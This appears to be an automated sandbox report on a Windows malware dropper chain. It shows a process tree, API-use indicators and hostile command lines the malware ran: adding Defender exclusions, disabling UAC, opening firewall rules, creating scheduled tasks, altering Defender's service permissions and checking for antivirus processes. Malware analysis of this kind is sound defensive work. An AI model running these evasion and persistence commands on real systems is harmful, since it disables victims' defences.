Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	jok.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
908	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4744	amert.exe
4744	amert.exe
5088	explorha.exe
5088	explorha.exe
1096	RegAsm.exe
1096	RegAsm.exe
2876	powershell.exe
2876	powershell.exe
2876	powershell.exe
2876	powershell.exe
708	explorha.exe
708	explorha.exe
1680	chrome.exe
1680	chrome.exe
5264	rundll32.exe
5264	rundll32.exe
5264	rundll32.exe
5264	rundll32.exe
5264	rundll32.exe
5264	rundll32.exe
5264	rundll32.exe
5264	rundll32.exe
5264	rundll32.exe
5264	rundll32.exe
5436	powershell.exe
5436	powershell.exe
5436	powershell.exe
5436	powershell.exe
1096	RegAsm.exe
1096	RegAsm.exe
4184	powershell.exe
4184	powershell.exe
4184	powershell.exe
4184	powershell.exe
6316	GameService.exe
6316	GameService.exe
1344	keks.exe
1344	keks.exe
1344	keks.exe
1344	keks.exe
1344	keks.exe
1344	keks.exe
1344	keks.exe
1344	keks.exe
1344	keks.exe
1344	keks.exe
1344	keks.exe
1344	keks.exe
1344	keks.exe
1344	keks.exe
1344	keks.exe
1344	keks.exe
1344	keks.exe
1344	keks.exe
1344	keks.exe
1344	keks.exe
1344	keks.exe
1344	keks.exe
1344	keks.exe
1344	keks.exe
1344	keks.exe
1344	keks.exe
1344	keks.exe
1344	keks.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

pid	Process
1680	chrome.exe
1680	chrome.exe
1680	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4932	installutil.exe
Token: SeDebugPrivilege	2876	powershell.exe
Token: SeIncreaseQuotaPrivilege	2876	powershell.exe
Token: SeSecurityPrivilege	2876	powershell.exe
Token: SeTakeOwnershipPrivilege	2876	powershell.exe
Token: SeLoadDriverPrivilege	2876	powershell.exe
Token: SeSystemProfilePrivilege	2876	powershell.exe
Token: SeSystemtimePrivilege	2876	powershell.exe
Token: SeProfSingleProcessPrivilege	2876	powershell.exe
Token: SeIncBasePriorityPrivilege	2876	powershell.exe
Token: SeCreatePagefilePrivilege	2876	powershell.exe
Token: SeBackupPrivilege	2876	powershell.exe
Token: SeRestorePrivilege	2876	powershell.exe
Token: SeShutdownPrivilege	2876	powershell.exe
Token: SeDebugPrivilege	2876	powershell.exe
Token: SeSystemEnvironmentPrivilege	2876	powershell.exe
Token: SeRemoteShutdownPrivilege	2876	powershell.exe
Token: SeUndockPrivilege	2876	powershell.exe
Token: SeManageVolumePrivilege	2876	powershell.exe
Token: 33	2876	powershell.exe
Token: 34	2876	powershell.exe
Token: 35	2876	powershell.exe
Token: 36	2876	powershell.exe
Token: SeShutdownPrivilege	1680	chrome.exe
Token: SeCreatePagefilePrivilege	1680	chrome.exe
Token: SeShutdownPrivilege	1680	chrome.exe
Token: SeCreatePagefilePrivilege	1680	chrome.exe
Token: SeShutdownPrivilege	1680	chrome.exe
Token: SeCreatePagefilePrivilege	1680	chrome.exe
Token: SeShutdownPrivilege	1680	chrome.exe
Token: SeCreatePagefilePrivilege	1680	chrome.exe
Token: SeShutdownPrivilege	1680	chrome.exe
Token: SeCreatePagefilePrivilege	1680	chrome.exe
Token: SeShutdownPrivilege	1680	chrome.exe
Token: SeCreatePagefilePrivilege	1680	chrome.exe
Token: SeShutdownPrivilege	1680	chrome.exe
Token: SeCreatePagefilePrivilege	1680	chrome.exe
Token: SeShutdownPrivilege	1680	chrome.exe
Token: SeCreatePagefilePrivilege	1680	chrome.exe
Token: SeShutdownPrivilege	1680	chrome.exe
Token: SeCreatePagefilePrivilege	1680	chrome.exe
Token: SeShutdownPrivilege	1680	chrome.exe
Token: SeCreatePagefilePrivilege	1680	chrome.exe
Token: SeShutdownPrivilege	1680	chrome.exe
Token: SeCreatePagefilePrivilege	1680	chrome.exe
Token: SeDebugPrivilege	5436	powershell.exe
Token: SeShutdownPrivilege	1680	chrome.exe
Token: SeCreatePagefilePrivilege	1680	chrome.exe
Token: SeShutdownPrivilege	1680	chrome.exe
Token: SeCreatePagefilePrivilege	1680	chrome.exe
Token: SeShutdownPrivilege	1680	chrome.exe
Token: SeCreatePagefilePrivilege	1680	chrome.exe
Token: SeShutdownPrivilege	1680	chrome.exe
Token: SeCreatePagefilePrivilege	1680	chrome.exe
Token: SeShutdownPrivilege	1680	chrome.exe
Token: SeCreatePagefilePrivilege	1680	chrome.exe
Token: SeShutdownPrivilege	1680	chrome.exe
Token: SeCreatePagefilePrivilege	1680	chrome.exe
Token: SeShutdownPrivilege	1680	chrome.exe
Token: SeCreatePagefilePrivilege	1680	chrome.exe
Token: SeDebugPrivilege	5304	trf.exe
Token: SeShutdownPrivilege	1680	chrome.exe
Token: SeCreatePagefilePrivilege	1680	chrome.exe
Token: SeShutdownPrivilege	1680	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
1680	chrome.exe
1680	chrome.exe
1680	chrome.exe
1680	chrome.exe
1680	chrome.exe
1680	chrome.exe
1680	chrome.exe
1680	chrome.exe
1680	chrome.exe
1680	chrome.exe
1680	chrome.exe
1680	chrome.exe
1680	chrome.exe
1680	chrome.exe
1680	chrome.exe
1680	chrome.exe
1680	chrome.exe
1680	chrome.exe
1680	chrome.exe
1680	chrome.exe
1680	chrome.exe
1680	chrome.exe
1680	chrome.exe
1680	chrome.exe
1680	chrome.exe
1680	chrome.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
1680	chrome.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
6032	u4ck.1.exe
6032	u4ck.1.exe
6032	u4ck.1.exe
6032	u4ck.1.exe
6032	u4ck.1.exe
6032	u4ck.1.exe
6032	u4ck.1.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
1680	chrome.exe
1680	chrome.exe
1680	chrome.exe
1680	chrome.exe
1680	chrome.exe
1680	chrome.exe
1680	chrome.exe
1680	chrome.exe
1680	chrome.exe
1680	chrome.exe
1680	chrome.exe
1680	chrome.exe
1680	chrome.exe
1680	chrome.exe
1680	chrome.exe
1680	chrome.exe
1680	chrome.exe
1680	chrome.exe
1680	chrome.exe
1680	chrome.exe
1680	chrome.exe
1680	chrome.exe
1680	chrome.exe
1680	chrome.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
6032	u4ck.1.exe
6032	u4ck.1.exe
6032	u4ck.1.exe
6032	u4ck.1.exe
6032	u4ck.1.exe
6032	u4ck.1.exe
6032	u4ck.1.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe
4136	9b90a2ae82.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1104 wrote to memory of 1900	1104	cbbf0f3ef60d36f4dacec456669bf6b5264a56ec4a88a7ca251fe0163c066c5b.exe	73
PID 1104 wrote to memory of 1900	1104	cbbf0f3ef60d36f4dacec456669bf6b5264a56ec4a88a7ca251fe0163c066c5b.exe	73
PID 1104 wrote to memory of 1900	1104	cbbf0f3ef60d36f4dacec456669bf6b5264a56ec4a88a7ca251fe0163c066c5b.exe	73
PID 1900 wrote to memory of 3768	1900	explorta.exe	74
PID 1900 wrote to memory of 3768	1900	explorta.exe	74
PID 1900 wrote to memory of 3768	1900	explorta.exe	74
PID 1900 wrote to memory of 4744	1900	explorta.exe	75
PID 1900 wrote to memory of 4744	1900	explorta.exe	75
PID 1900 wrote to memory of 4744	1900	explorta.exe	75
PID 4744 wrote to memory of 5088	4744	amert.exe	76
PID 4744 wrote to memory of 5088	4744	amert.exe	76
PID 4744 wrote to memory of 5088	4744	amert.exe	76
PID 5088 wrote to memory of 2836	5088	explorha.exe	77
PID 5088 wrote to memory of 2836	5088	explorha.exe	77
PID 5088 wrote to memory of 2836	5088	explorha.exe	77
PID 2836 wrote to memory of 5080	2836	swiiiii.exe	79
PID 2836 wrote to memory of 5080	2836	swiiiii.exe	79
PID 2836 wrote to memory of 5080	2836	swiiiii.exe	79
PID 2836 wrote to memory of 5080	2836	swiiiii.exe	79
PID 2836 wrote to memory of 5080	2836	swiiiii.exe	79
PID 2836 wrote to memory of 5080	2836	swiiiii.exe	79
PID 2836 wrote to memory of 5080	2836	swiiiii.exe	79
PID 2836 wrote to memory of 5080	2836	swiiiii.exe	79
PID 2836 wrote to memory of 5080	2836	swiiiii.exe	79
PID 5088 wrote to memory of 2488	5088	explorha.exe	82
PID 5088 wrote to memory of 2488	5088	explorha.exe	82
PID 5088 wrote to memory of 2488	5088	explorha.exe	82
PID 1900 wrote to memory of 2788	1900	explorta.exe	84
PID 1900 wrote to memory of 2788	1900	explorta.exe	84
PID 1900 wrote to memory of 2788	1900	explorta.exe	84
PID 5088 wrote to memory of 2428	5088	explorha.exe	85
PID 5088 wrote to memory of 2428	5088	explorha.exe	85
PID 5088 wrote to memory of 2428	5088	explorha.exe	85
PID 2428 wrote to memory of 1096	2428	swiy.exe	87
PID 2428 wrote to memory of 1096	2428	swiy.exe	87
PID 2428 wrote to memory of 1096	2428	swiy.exe	87
PID 2428 wrote to memory of 1096	2428	swiy.exe	87
PID 2428 wrote to memory of 1096	2428	swiy.exe	87
PID 2428 wrote to memory of 1096	2428	swiy.exe	87
PID 2428 wrote to memory of 1096	2428	swiy.exe	87
PID 2428 wrote to memory of 1096	2428	swiy.exe	87
PID 2428 wrote to memory of 1096	2428	swiy.exe	87
PID 5088 wrote to memory of 4912	5088	explorha.exe	88
PID 5088 wrote to memory of 4912	5088	explorha.exe	88
PID 4912 wrote to memory of 2876	4912	file300un.exe	89
PID 4912 wrote to memory of 2876	4912	file300un.exe	89
PID 4912 wrote to memory of 4932	4912	file300un.exe	91
PID 4912 wrote to memory of 4932	4912	file300un.exe	91
PID 4912 wrote to memory of 4932	4912	file300un.exe	91
PID 4912 wrote to memory of 4932	4912	file300un.exe	91
PID 4912 wrote to memory of 4932	4912	file300un.exe	91
PID 4912 wrote to memory of 4932	4912	file300un.exe	91
PID 4912 wrote to memory of 4932	4912	file300un.exe	91
PID 4912 wrote to memory of 4932	4912	file300un.exe	91
PID 1900 wrote to memory of 4136	1900	explorta.exe	97
PID 1900 wrote to memory of 4136	1900	explorta.exe	97
PID 1900 wrote to memory of 4136	1900	explorta.exe	97
PID 4136 wrote to memory of 1680	4136	9b90a2ae82.exe	98
PID 4136 wrote to memory of 1680	4136	9b90a2ae82.exe	98
PID 1680 wrote to memory of 4148	1680	chrome.exe	100
PID 1680 wrote to memory of 4148	1680	chrome.exe	100
PID 1680 wrote to memory of 4304	1680	chrome.exe	102
PID 1680 wrote to memory of 4304	1680	chrome.exe	102
PID 1680 wrote to memory of 4304	1680	chrome.exe	102

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file300un.exe

C:\Users\Admin\AppData\Local\Temp\cbbf0f3ef60d36f4dacec456669bf6b5264a56ec4a88a7ca251fe0163c066c5b.exe
"C:\Users\Admin\AppData\Local\Temp\cbbf0f3ef60d36f4dacec456669bf6b5264a56ec4a88a7ca251fe0163c066c5b.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1104
- C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
  "C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Suspicious use of WriteProcessMemory
  PID:1900
- - C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
    "C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"
    3⤵
    PID:3768
- - C:\Users\Admin\AppData\Local\Temp\1000019001\amert.exe
    "C:\Users\Admin\AppData\Local\Temp\1000019001\amert.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:4744
  - - C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
      "C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:5088
    - - C:\Users\Admin\AppData\Local\Temp\1000066001\swiiiii.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000066001\swiiiii.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:2836
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:5080
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2836 -s 836
        6⤵
        Program crash
        
        PID:2616
    - - C:\Users\Admin\AppData\Local\Temp\1000071001\jok.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000071001\jok.exe"
        5⤵
        Executes dropped EXE
        Modifies system certificate store
        
        PID:2488
      - C:\Users\Admin\AppData\Local\Temp\enpl.exe
        
        "C:\Users\Admin\AppData\Local\Temp\enpl.exe"
        6⤵
        
        PID:6356
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k move Elimination Elimination.cmd & Elimination.cmd & exit
        7⤵
        
        PID:6812
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        
        PID:1936
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa.exe opssvc.exe"
        8⤵
        
        PID:4836
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        
        PID:6088
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
        8⤵
        
        PID:6248
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 1151
        8⤵
        
        PID:6444
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "despiteoncemartincidence" Ex
        8⤵
        
        PID:6588
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b Ref + Drives + Corners 1151\r
        8⤵
        
        PID:6512
        
        C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\1151\Lucas.pif
        
        1151\Lucas.pif 1151\r
        8⤵
        
        PID:428
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 428 -s 2304
        9⤵
        Program crash
        
        PID:4560
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 5 127.0.0.1
        8⤵
        Runs ping.exe
        
        PID:908
      - C:\Users\Admin\AppData\Local\Temp\pl.exe
        
        "C:\Users\Admin\AppData\Local\Temp\pl.exe"
        6⤵
        
        PID:6652
        
        C:\Users\Public\Pictures\newpub.exe
        
        "C:\Users\Public\Pictures\newpub.exe"
        7⤵
        
        PID:6660
    - - C:\Users\Admin\AppData\Local\Temp\1000073001\swiy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000073001\swiy.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:2428
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        Loads dropped DLL
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:1096
    - - C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe"
        5⤵
        UAC bypass
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        System policy modification
        
        PID:4912
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe" -Force
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2876
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
        6⤵
        Drops startup file
        Suspicious use of AdjustPrivilegeToken
        
        PID:4932
        
        C:\Users\Admin\Pictures\vnk9tUEAJePB8ba50JljxnWI.exe
        
        "C:\Users\Admin\Pictures\vnk9tUEAJePB8ba50JljxnWI.exe"
        7⤵
        Executes dropped EXE
        
        PID:5636
        
        C:\Users\Admin\AppData\Local\Temp\u4ck.0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u4ck.0.exe"
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        
        PID:4988
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\u4ck.0.exe" & del "C:\ProgramData\*.dll"" & exit
        9⤵
        
        PID:684
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 5
        10⤵
        Delays execution with timeout.exe
        
        PID:7012
        
        C:\Users\Admin\AppData\Local\Temp\u4ck.1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u4ck.1.exe"
        8⤵
        Blocklisted process makes network request
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:6032
        
        C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
        9⤵
        
        PID:6624
        
        C:\Users\Admin\Pictures\AEY6uLsOwAVuhQ9weg2lKxi4.exe
        
        "C:\Users\Admin\Pictures\AEY6uLsOwAVuhQ9weg2lKxi4.exe"
        7⤵
        Executes dropped EXE
        
        PID:5800
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:500
        
        C:\Users\Admin\Pictures\AEY6uLsOwAVuhQ9weg2lKxi4.exe
        
        "C:\Users\Admin\Pictures\AEY6uLsOwAVuhQ9weg2lKxi4.exe"
        8⤵
        Windows security bypass
        Windows security modification
        Adds Run key to start application
        Checks for VirtualBox DLLs, possible anti-VM trick
        Drops file in Windows directory
        Modifies data under HKEY_USERS
        
        PID:5552
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        
        PID:5548
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        9⤵
        
        PID:6164
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        10⤵
        Modifies Windows Firewall
        
        PID:6340
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:2544
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:5640
        
        C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        9⤵
        
        PID:5132
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:968
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        10⤵
        Creates scheduled task(s)
        
        PID:5560
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        10⤵
        
        PID:6488
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5280
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4688
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        10⤵
        
        PID:968
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        10⤵
        Creates scheduled task(s)
        
        PID:1980
        
        C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        10⤵
        
        PID:5612
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        11⤵
        
        PID:3924
        
        C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        12⤵
        Launches sc.exe
        
        PID:5480
        
        C:\Users\Admin\Pictures\Jw2APj9A3AIg1Sx09xCCBO2x.exe
        
        "C:\Users\Admin\Pictures\Jw2APj9A3AIg1Sx09xCCBO2x.exe"
        7⤵
        Executes dropped EXE
        
        PID:5924
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5820
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        
        PID:6068
        
        C:\Users\Admin\Pictures\Jw2APj9A3AIg1Sx09xCCBO2x.exe
        
        "C:\Users\Admin\Pictures\Jw2APj9A3AIg1Sx09xCCBO2x.exe"
        8⤵
        Windows security bypass
        Windows security modification
        Adds Run key to start application
        Checks for VirtualBox DLLs, possible anti-VM trick
        Drops file in Windows directory
        
        PID:6280
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:6584
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        9⤵
        
        PID:3192
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        10⤵
        Modifies Windows Firewall
        
        PID:3240
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:5480
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        
        PID:2736
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        
        PID:3912
        
        C:\Users\Admin\Pictures\zFin8p9T2XaFxNzDfLsRDA3Q.exe
        
        "C:\Users\Admin\Pictures\zFin8p9T2XaFxNzDfLsRDA3Q.exe"
        7⤵
        Executes dropped EXE
        
        PID:5844
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
